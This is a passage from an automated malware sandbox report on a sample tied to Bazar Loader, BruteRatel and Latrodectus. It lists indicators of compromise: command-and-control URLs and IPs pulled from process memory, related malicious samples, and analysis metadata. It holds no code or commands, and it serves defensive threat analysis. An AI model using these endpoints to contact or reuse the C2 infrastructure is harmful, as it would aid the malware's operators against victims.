                                                                                                                                  http://r10.o.lencrundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://api.msn.com/v1/news/Feed/Windows?z$explorer.exe, 0000001E.00000000.1578935505.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008685000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-darkexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://tiguanin.com:8041/bazar.phpnrundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://bazarunet.com:8041/admin.phpNrundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://tiguanin.com:8041/bazar.phpkrundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://tiguanin.com:8041/Erundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-distexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://isomicrotich.com/aexplorer.exe, 0000001E.00000002.2591885032.000000000BEC0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://tiguanin.com:8041/;rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://greshunka.com/virundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://greshunka.com:8041/0rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://schemas.microexplorer.exe, 0000001E.00000000.1578069670.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578735693.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1576236568.0000000002C60000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://parade.com/61481/toriavey/where-did-hamburgers-originateexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://tiguanin.com:8041/Nrundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://greshunka.com:8041/)rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://api.msn.com/~Texplorer.exe, 0000001E.00000000.1578935505.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://greshunka.com/~irundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhbexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://x1.c.lencr.org/0rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731677122.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848849900.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1574607542.0000029F3B856000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B7E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644516828.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644479966.0000029F3B858000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2366245082.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029246377.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2218239826.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731411754.0000029F3BE0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://x1.i.lencr.org/0rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731677122.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848849900.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1574607542.0000029F3B856000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B7E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644516828.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644479966.0000029F3B858000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2366245082.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029246377.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2218239826.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731411754.0000029F3BE0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://greshunka.com:8041/bazar.phpadrundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://tiguanin.com:8041/0rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://bazarunet.com:8041/admin.php=rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://greshunka.com:8041/Mrundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-oexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://greshunka.com:8041/bazar.phpyrundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://bazarunet.com:8041/rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2372533125.0000029F3BE20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://greshunka.com:8041/Erundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://bazarunet.com:8041/admin.php1rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://tiguanin.com:8041/admin.phprundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown

                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        188.114.96.3
                                                                                                                                                                                                        		isomicrotich.comEuropean Union
                                                                                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                        82.115.223.39
                                                                                                                                                                                                        		greshunka.comRussian Federation
                                                                                                                                                                                                        		209821MIDNET-ASTK-TelecomRUtrue
                                                                                                                                                                                                        80.78.24.30
                                                                                                                                                                                                        		tiguanin.comCyprus
                                                                                                                                                                                                        		37560CYBERDYNELRtrue

                                                                                                                                                                                                        General Information

                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                        Analysis ID:1525190
                                                                                                                                                                                                        Start date and time:2024-10-03 20:44:06 +02:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 7m 34s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                        Number of analysed new started processes analysed:33
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Sample name:vierm_soft_x64.dll.dll
                                                                                                                                                                                                        (renamed file extension from exe to dll)
                                                                                                                                                                                                        Original Sample Name:vierm_soft_x64.dll.exe
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal100.troj.evad.winDLL@28/25@5/3
                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                        • Successful, ratio: 66.7%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                        • Number of executed functions: 48
                                                                                                                                                                                                        • Number of non-executed functions: 204

                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                        • Execution Graph export aborted for target rundll32.exe, PID 3648 because there are no executed function
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • VT rate limit hit for: vierm_soft_x64.dll.dll

                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        14:45:00API Interceptor6x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                        14:45:03API Interceptor1x Sleep call for process: loaddll64.exe modified
                                                                                                                                                                                                        14:45:04API Interceptor2204325x Sleep call for process: rundll32.exe modified
                                                                                                                                                                                                        14:45:55API Interceptor2198427x Sleep call for process: explorer.exe modified

                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                        IPs

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        188.114.96.31tstvk3Sls.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                        • microsoft-rage.world/Api/v3/qjqzqiiqayjq
                                                                                                                                                                                                        http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • asm.alcateia.org/
                                                                                                                                                                                                        hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
                                                                                                                                                                                                        z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • www.bayarcepat19.click/g48c/
                                                                                                                                                                                                        update SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • www.bayarcepat19.click/5hcm/
                                                                                                                                                                                                        docs.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                                                                                                                                                                                                        https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • wwvmicrosx.live/office365/office_cookies/main/
                                                                                                                                                                                                        http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • fitur-dana-terbaru-2024.pages.dev/favicon.ico
                                                                                                                                                                                                        http://mobilelegendsmycode.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • mobilelegendsmycode.com/favicon.ico
                                                                                                                                                                                                        http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                        • download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
                                                                                                                                                                                                        82.115.223.39Document-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                          Document-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                            vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                              dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                  0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                    DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      80.78.24.30e664858e8b8ff1ac08f6dd812a68d65d05a704262fa13862538c3c45.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • fredlomberhfile.com:2351/lpfdokkq
                                                                                                                                                                                                                      s5YgOFFmFK.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                      • smockalifatori.com/
                                                                                                                                                                                                                      CiMXn78mMb.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                      • skayfingertawr.com/
                                                                                                                                                                                                                      Scan_06-28_INV__70.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                      • hloyagorepa.com/
                                                                                                                                                                                                                      Scan_06-28_INV__70.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                      • hloyagorepa.com/
                                                                                                                                                                                                                      Scan_06-28_INV__10.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                      • hloyagorepa.com/
                                                                                                                                                                                                                      Scan_06-28_INV__10.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                      • hloyagorepa.com/
                                                                                                                                                                                                                      05387199.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                      • shoterqana.com/
                                                                                                                                                                                                                      08778399.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                      • shoterqana.com/
                                                                                                                                                                                                                      Contract_March_23_INV#305.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                      • aoureskindzet.com/

                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      bazarunet.comDocument-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 80.78.24.30
                                                                                                                                                                                                                      Document-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 185.106.92.54
                                                                                                                                                                                                                      vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 185.106.92.54
                                                                                                                                                                                                                      dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 185.106.92.54
                                                                                                                                                                                                                      Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 185.106.92.54
                                                                                                                                                                                                                      0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 185.106.92.54
                                                                                                                                                                                                                      DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 185.106.92.54
                                                                                                                                                                                                                      Document-21-41-00.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 193.124.185.116
                                                                                                                                                                                                                      CITROEN.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                                                                                                                                                                                      • 193.124.185.116
                                                                                                                                                                                                                      x64_stealth.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 193.124.185.116
                                                                                                                                                                                                                      tiguanin.comDocument-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 80.78.24.30
                                                                                                                                                                                                                      Document-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.40
                                                                                                                                                                                                                      vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.40
                                                                                                                                                                                                                      dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.40
                                                                                                                                                                                                                      Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.40
                                                                                                                                                                                                                      0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.40
                                                                                                                                                                                                                      DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 82.115.223.40
                                                                                                                                                                                                                      Document-21-41-00.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 193.124.185.117
                                                                                                                                                                                                                      CITROEN.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                                                                                                                                                                                      • 193.124.185.117
                                                                                                                                                                                                                      x64_stealth.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
